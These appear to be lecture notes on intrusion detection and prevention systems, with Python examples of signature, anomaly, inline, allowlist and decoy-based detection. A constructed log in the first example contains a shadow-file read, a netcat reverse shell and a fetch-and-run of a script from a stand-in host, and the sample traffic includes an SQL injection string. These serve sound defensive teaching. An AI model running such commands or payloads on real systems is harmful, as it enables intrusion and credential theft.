INTRUSION: Intrusion Detection System and Intrusion Prevention System
What is an intrusion?
Intrusions are activities that violate the security policy of a system.
Intrusion Detection System (IDS): software that automates the intrusion detection process. The primary responsibility of an IDS is to detect unwanted activity and report it.
Intrusion Prevention System (IPS): software that has all the capabilities of an intrusion detection system and can also attempt to stop the incidents it detects.
Types of IDS
Based on the source of the audit information each IDS uses, IDSs may be classified into:
- Host-based IDSs
- Distributed IDSs
- Network-based IDSs
The types in a little more detail
Host-based IDS: gets its data from the host's audit trails (system logs, process and file activity); detects attacks against a single host.
Distributed IDS: gathers data from multiple hosts, and possibly from the network that connects them; detects attacks involving multiple hosts.
Network-based IDS: gets its data from network traffic; detects attacks that are visible on the wire.
Misuse Detection
Based on known attack actions: features are extracted from known intrusions and encoded as pre-defined rules (signatures), integrating human knowledge of what attacks look like.
Disadvantage: cannot detect novel or unknown attacks, because nothing that has not been written into a rule is ever reported.
Anomaly Detection
Based on the normal behaviour of a subject (a user, host or process). A profile of normal behaviour is built from training data, which is usually assumed to contain no intrusion data. Any action that significantly deviates from the normal behaviour is considered an intrusion.
Anomaly Detection: Disadvantages
The profile is based on data collected over a period of normal operation. If noise (intrusion activity) is present in the training data, it becomes part of the profile of "normal" behaviour and causes mis-classification: that intrusion, and others that look like it, will no longer be reported.
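The two detection approaches side by side, as an added example that is not part of the original slides. The audit trail, the two signatures and the per-user command-rate baselines are all constructed for illustration. The misuse detector reports only the two steps it has rules for and misses the rest of the same session; the anomaly detector flags the whole burst against a clean baseline, but stops flagging it once the same burst has been left in the training data.

```python
import re
import statistics
from collections import Counter

# Constructed host audit trail, one command per line: "HH:MM:SS user source-ip command".
# These lines are illustrative and not taken from the slides.
SAMPLE_LOG = """\
10:00:01 alice 10.0.0.5 ls -la /home/alice
10:00:07 alice 10.0.0.5 cat notes.txt
10:00:12 bob 10.0.0.9 git pull
10:00:20 bob 10.0.0.9 make test
10:00:31 alice 10.0.0.5 vim report.md
10:00:45 carol 10.0.0.7 cat /etc/passwd
10:00:46 carol 10.0.0.7 cat /etc/shadow
10:00:47 carol 10.0.0.7 nc -e /bin/sh 203.0.113.8 4444
10:00:48 carol 10.0.0.7 wget http://203.0.113.8/x.sh
10:00:49 carol 10.0.0.7 chmod +x x.sh
10:00:50 carol 10.0.0.7 ./x.sh
10:00:51 carol 10.0.0.7 rm x.sh
"""

# Misuse detection: hand-written rules that encode known attack actions.
# Nothing outside these patterns is ever reported.
SIGNATURES = {
    "shadow-read":   re.compile(r"\bcat\b.*/etc/shadow\b"),
    "reverse-shell": re.compile(r"\bnc\b.*\s-e\s+/bin/sh\b"),
}

def parse(log):
    events = []
    for line in log.splitlines():
        ts, user, src, cmd = line.split(" ", 3)
        events.append({"ts": ts, "user": user, "src": src, "cmd": cmd})
    return events

def misuse_detect(events):
    """Return (timestamp, user, rule) for every event matching a pre-defined signature."""
    return [(e["ts"], e["user"], name)
            for e in events
            for name, pat in SIGNATURES.items()
            if pat.search(e["cmd"])]

def anomaly_detect(events, baseline, threshold=3.0):
    """Return (user, count, z) for users whose command count in this window is more than
    `threshold` standard deviations away from the per-user rate learned from `baseline`."""
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline) or 1e-9   # a perfectly flat baseline must not divide by zero
    flagged = []
    for user, n in Counter(e["user"] for e in events).items():
        z = (n - mean) / stdev
        if abs(z) > threshold:
            flagged.append((user, n, round(z, 2)))
    return flagged

# Per-user commands per minute recorded during a clean training period (constructed).
CLEAN_BASELINE = [2, 3, 2, 3, 2, 4, 3]
# The same training period with an intrusion burst left in it: the "noise" case.
POISONED_BASELINE = CLEAN_BASELINE + [7, 8]

if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print("misuse hits:", misuse_detect(events))
    print("anomalies, clean baseline:", anomaly_detect(events, CLEAN_BASELINE))
    print("anomalies, poisoned baseline:", anomaly_detect(events, POISONED_BASELINE))
```

Note what each method does not see: the misuse detector says nothing about the download and execution of x.sh, because no rule describes it, and the anomaly detector's verdict on carol flips from "intrusion" to "normal" purely because the training window was not clean.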
Some of the benefits of an IDS
- monitors the operation of firewalls, routers, key management servers and files critical to other security mechanisms
- allows the administrator to tune, organize and comprehend often incomprehensible operating system audit trails and other logs
- can make security management of systems by non-expert staff possible by providing a user-friendly interface
- comes with an extensive attack signature database against which information from the customer's system can be matched
- can recognize and report alterations to data files
An IDS is not a silver bullet
An IDS:
- cannot conduct investigations of attacks without human intervention
- cannot compensate for weaknesses in network protocols
- cannot compensate for weak identification and authentication mechanisms
- is capable of monitoring network traffic, but only up to a certain traffic level
Intrusion Prevention System
Intrusion prevention systems are network security devices that monitor network and/or system activities for malicious activity (intrusions).
The main functions of an Intrusion Prevention System (IPS) are to:
- identify intrusions
- log information about intrusions
- attempt to block/stop intrusions, and
- report intrusions
An Intrusion Detection System (IDS) only detects intrusions; it does not block them.
What is an IPS?
An Intrusion Prevention System (IPS) is any device (hardware or software) that has the ability to detect attacks, both known and unknown, and prevent the attack from being successful.
Intrusion Prevention Systems (IPS)
Attackers are often one step ahead of security professionals, who keep having to come up with innovative means to detect and prevent attacks. An IPS is a preventive device, rather than a detective one like an IDS.
Classification of IPS
Broadly classified into two categories:
- Host IPS (HIPS)
- Network IPS (NIPS)
Host IPS
A HIPS is installed directly on the system being protected. It binds closely with the operating system kernel and services: it monitors and intercepts system calls to the kernel in order to prevent attacks as well as log them.
Network IPS
A NIPS has two network interfaces, one designated as internal and one as external. Packets pass through both interfaces, and the device determines whether each packet being examined poses a threat. If it detects a malicious packet, an alert is raised and the packet is discarded immediately. Legitimate packets are passed through to the second interface and on to their intended destination.
Inline Network IPS
It is configured with two NICs, one for management and one for detection. The NIC configured for detection usually does not have an IP address assigned, so the sensor itself cannot be addressed from the monitored segment. It works by sitting between the systems that need to be protected and the rest of the network, and inspects every packet for any intrusion it is configured to look for.
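A model of the inline data path described above, as an added example that is not part of the original slides. Packets enter on the external interface, are matched against signatures, and either leave on the internal interface or are discarded; the same engine run in "ids" mode only alerts. The packets, the two signatures and the class and function names are constructed for illustration. The second signature is deliberately too broad, to show the practical cost of a false positive once the device is inline: in IDS mode the helpdesk ticket that mentions cmd.exe merely raises an alert, in IPS mode it never reaches the server.

```python
import re
from dataclasses import dataclass
from typing import Optional

@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes

@dataclass
class Verdict:
    action: str                   # "pass" (forwarded to the internal interface) or "drop"
    alert: Optional[str] = None   # name of the signature that fired, if any

# Constructed signatures: (name, destination port, pattern over the payload).
# The second one is deliberately too broad, to show what a false positive costs inline.
SIGNATURES = [
    ("sql-tautology", 80, re.compile(rb"'\s*or\s+'1'\s*=\s*'1", re.I)),
    ("windows-command-shell", 80, re.compile(rb"cmd\.exe", re.I)),
]

class InlineSensor:
    """Models the data path of an inline device: traffic enters on the external
    interface, is inspected, and either leaves on the internal interface or is
    discarded. `mode` selects detect-only (IDS) or prevent (IPS) behaviour."""

    def __init__(self, mode: str = "ips"):
        if mode not in ("ids", "ips"):
            raise ValueError("mode must be 'ids' or 'ips'")
        self.mode = mode
        self.alerts = []      # in a real device these leave via the management NIC
        self.forwarded = []   # packets that reached the internal interface

    def match(self, pkt: Packet) -> Optional[str]:
        for name, port, pat in SIGNATURES:
            if pkt.dport == port and pat.search(pkt.payload):
                return name
        return None

    def process(self, pkt: Packet) -> Verdict:
        sig = self.match(pkt)
        if sig is None:
            self.forwarded.append(pkt)
            return Verdict("pass")
        self.alerts.append(f"{sig} {pkt.src} -> {pkt.dst}:{pkt.dport}")
        if self.mode == "ips":
            return Verdict("drop", sig)       # discarded immediately; never reaches the internal NIC
        self.forwarded.append(pkt)            # IDS: alert, but let the packet through
        return Verdict("pass", sig)

# Constructed traffic: a normal request, an injection attempt, and a legitimate
# helpdesk ticket whose text happens to mention cmd.exe.
TRAFFIC = [
    Packet("198.51.100.7", "10.0.0.80", 80, b"GET /index.html HTTP/1.1\r\nHost: shop\r\n\r\n"),
    Packet("198.51.100.7", "10.0.0.80", 80, b"GET /login?user=admin' or '1'='1 HTTP/1.1\r\n"),
    Packet("203.0.113.4",  "10.0.0.80", 80, b"POST /tickets HTTP/1.1\r\n\r\nbody=how do I open cmd.exe"),
]

def run(mode: str, packets=TRAFFIC):
    """Push the packet list through a fresh sensor; returns the sensor and one verdict per packet."""
    sensor = InlineSensor(mode)
    verdicts = [sensor.process(p) for p in packets]
    return sensor, verdicts

if __name__ == "__main__":
    for mode in ("ids", "ips"):
        sensor, verdicts = run(mode)
        print(mode, [v.action for v in verdicts],
              "forwarded:", len(sensor.forwarded), "alerts:", sensor.alerts)
```

The usual practice is to run a new rule set in detect-only mode first and review the alerts it produces on real traffic before switching the same rules to prevent mode.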
Layer Seven Switches
Placing these devices in front of your firewalls would give protection for the entire network. The drawback is that they can only stop attacks that they know about. The one class of attack they can stop that most other IPSs cannot is denial-of-service (DoS) attacks.
Application Firewalls
These IPSs are loaded on each server that is to be protected and are customizable to each application they protect. An application firewall profiles a system before protecting it: during profiling it watches the users' interaction with the application and the application's interaction with the operating system to determine what legitimate interaction looks like. The drawback is that when the application is updated it may have to be profiled again, so that it does not block legitimate use.
Hybrid Switches
They inspect specific traffic for malicious content, as configured. A hybrid switch works in a similar manner to a layer seven switch, but has detailed knowledge of the web server and of the application that sits on top of it. It also blocks any user request that does not match one of the permitted requests.
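The profiling model that both the application firewall and the hybrid switch rely on, as an added example that is not part of the original slides. The profile records what legitimate use looks like (method, path shape and parameter names) and then permits only requests matching it; anything else, including a genuine new feature shipped in an update, is blocked until the profile is refreshed. The request list, the generalization rule for numeric path segments, and the class and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

def generalize(path: str) -> str:
    """Collapse purely numeric path segments so /products/42 and /products/7 share one profile entry."""
    return re.sub(r"/\d+(?=/|$)", "/{id}", path)

def request_key(method: str, url: str):
    """What the profile records about a request: method, generalized path, and the set of parameter names."""
    parts = urlsplit(url)
    params = tuple(sorted(parse_qs(parts.query, keep_blank_values=True)))
    return (method.upper(), generalize(parts.path), params)

class ApplicationProfile:
    """Positive security model: only interactions observed during profiling are permitted."""

    def __init__(self):
        self.allowed = set()

    def learn(self, requests):
        for method, url in requests:
            self.allowed.add(request_key(method, url))

    def permits(self, method: str, url: str) -> bool:
        return request_key(method, url) in self.allowed

# Constructed requests captured while watching legitimate users during profiling.
PROFILING_TRAFFIC = [
    ("GET", "/"),
    ("GET", "/products/42"),
    ("GET", "/products/7"),
    ("GET", "/search?q=shoes"),
    ("POST", "/cart/add"),
    ("POST", "/checkout"),
]

def demo():
    """Exercise the profile with accepted, rejected and post-update requests; returns case -> permitted."""
    profile = ApplicationProfile()
    profile.learn(PROFILING_TRAFFIC)
    results = {
        "known path, new id":              profile.permits("GET", "/products/99"),
        "known params":                    profile.permits("GET", "/search?q=boots"),
        "unexpected param":                profile.permits("GET", "/search?q=boots&debug=1"),
        "unprofiled path":                 profile.permits("GET", "/admin/export"),
        "wrong method":                    profile.permits("POST", "/products/42"),
        "new feature before re-profiling": profile.permits("GET", "/wishlist"),
    }
    # The application is updated and ships /wishlist: legitimate use is blocked until the
    # profile is refreshed, which is the drawback the slides describe.
    profile.learn([("GET", "/wishlist")])
    results["new feature after re-profiling"] = profile.permits("GET", "/wishlist")
    return results

if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{'allow' if ok else 'block':5} {case}")
```

Because the model is an allowlist, its coverage is only as good as the profiling period: a legitimate request type never exercised while learning is indistinguishable from an attack, which is why re-profiling after every application change matters.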
Deceptive Applications
A deceptive application watches all your network traffic and works out what good traffic looks like, in particular which services really exist. When an attacker attempts to connect to a service that does not exist, it sends back a response marked with some bogus data. When the attacker comes back and tries to exploit the server using that marked data, the IPS recognizes the mark and stops all traffic coming from the attacker.
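The marking mechanism described above, as an added example that is not part of the original slides. The set of real services is given to the class directly rather than learned from traffic, the bogus data is a session cookie carrying a random marker, and the addresses, ports and class and function names are all constructed for illustration.

```python
import secrets

class DeceptiveApplication:
    """Answers probes of services that do not exist with a marked, bogus response.
    A later request that carries the marker identifies its sender as an attacker,
    and all further traffic from that sender is stopped."""

    def __init__(self, real_services):
        self.real_services = set(real_services)  # (ip, port) pairs known to be legitimate
        self.markers = {}                        # marker -> source the decoy was sent to
        self.blocked = set()

    def handle(self, src, dst, port, payload=b""):
        """Return (action, response): action is 'pass', 'decoy' or 'blocked'."""
        if src in self.blocked:
            return ("blocked", None)
        # Only the decoy ever emitted a marker, so seeing one in a request means the
        # sender is reusing what it learned from a service that does not exist.
        if any(marker.encode() in payload for marker in self.markers):
            self.blocked.add(src)
            return ("blocked", None)
        if (dst, port) in self.real_services:
            return ("pass", None)
        # Unknown service: fabricate a plausible reply carrying an unguessable marker,
        # so that a legitimate client can never send it by accident.
        marker = secrets.token_hex(8)
        self.markers[marker] = src
        response = b"HTTP/1.1 200 OK\r\nSet-Cookie: session=" + marker.encode() + b"\r\n\r\n"
        return ("decoy", response)

def demo():
    """Constructed scenario: the web server really listens on 10.0.0.80:80 only."""
    ips = DeceptiveApplication(real_services={("10.0.0.80", 80)})
    attacker, client, server = "198.51.100.7", "203.0.113.4", "10.0.0.80"
    actions = []
    # 1. the attacker probes a port nothing listens on and receives the decoy
    action, reply = ips.handle(attacker, server, 8080, b"GET /admin HTTP/1.1\r\n")
    actions.append(action)
    # 2. a legitimate client talks to the real service and is untouched
    actions.append(ips.handle(client, server, 80, b"GET / HTTP/1.1\r\n")[0])
    # 3. the attacker comes back and replays the marked cookie against the real server
    cookie = reply.split(b"session=")[1].split(b"\r\n")[0]
    actions.append(ips.handle(attacker, server, 80,
                              b"GET / HTTP/1.1\r\nCookie: session=" + cookie + b"\r\n")[0])
    # 4. from now on everything from that source is dropped, marker or not
    actions.append(ips.handle(attacker, server, 80, b"GET / HTTP/1.1\r\n")[0])
    # 5. the legitimate client is still unaffected
    actions.append(ips.handle(client, server, 80, b"GET /cart HTTP/1.1\r\n")[0])
    return actions

if __name__ == "__main__":
    print(demo())   # ['decoy', 'pass', 'blocked', 'blocked', 'pass']
```

The marker has to be unpredictable and unique per probe: a fixed or guessable value would let an attacker recognize and strip it, and would risk a legitimate client tripping the block by coincidence.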